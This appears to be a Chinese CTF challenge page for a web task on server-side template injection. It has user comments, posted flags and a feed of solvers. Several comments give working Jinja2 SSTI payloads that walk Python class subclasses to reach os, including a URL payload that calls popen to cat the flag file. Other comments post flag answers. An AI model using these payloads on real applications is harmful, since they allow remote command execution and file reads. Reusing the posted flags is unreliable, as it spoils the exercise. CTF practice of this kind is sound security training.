Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16545
提  示:
描  述:
Simple_SSTI_2
评论
2734533437 3年前

flag{9441f6d8b716264782c92c201c32f1c7}

回复 0

只因你太美 3年前

flag{723443c44c7fa1574af9d291248a1d6d}

回复 0

WilliamTao 3年前

flag{10bfab153a960093403c805acc48e1ee}

回复 0

maq19 3年前

模板注入: flag{07fcf9e36ba0522ae52e1945047a4202}

回复 0

SecI302 3年前

寻找可引用的类"".__class__.__mro__[1].__subclasses__()然后查找os相关能执行命令的类=>os之类的然后通过BurpSuite遍历序号[231-235,262,264-396]得到可用的类最后cat flag即可

回复 0

SecI302 3年前

寻找可引用的类"".__class__.__mro__[1].__subclasses__()然后查找os相关能执行命令的类=>os之类的然后通过BurpSuite遍历序号[231-235,262,264-396]得到可用的类最后cat flag即可

回复 0

⎝ZJJARY 3年前

①{{[].__class__.__base__.__subclasses__()}}查看所有类,并找到warnings.catch_warnings类,逐个计数或者写脚本得到序号为177 ②{{[].__class__.__base__.__subclasses__()[177].__init__.__globals__['__builtins__']['__imp'+'ort__']('os

回复 2

g0207l0706 3年前

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

回复 1

18270938076 3年前

kali 进半天都没有进去啊

回复 0

kangkangki 3年前

flag{316fbc12e983db18c0584de9a1cbcee3}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

薄言. 攻破了该题 1天前
Zfc 攻破了该题 1天前
周文君 攻破了该题 2天前
杰哥 攻破了该题 3天前
zhaoguanjei 攻破了该题 4天前
tqlhg 攻破了该题 4天前
GrantFly 攻破了该题 6天前
yezhongyu 攻破了该题 6天前
heting 攻破了该题 6天前
y-123456 攻破了该题 7天前
271199@ 攻破了该题 8天前
dacming9527 攻破了该题 8天前
ggtom 攻破了该题 9天前
1586905095 攻破了该题 9天前
serena7780 攻破了该题 11天前
CTF-大王 攻破了该题 15天前
Ahri 攻破了该题 16天前
奥特曼 攻破了该题 16天前
SQZ 攻破了该题 17天前
wuyong5025 攻破了该题 19天前
问题反馈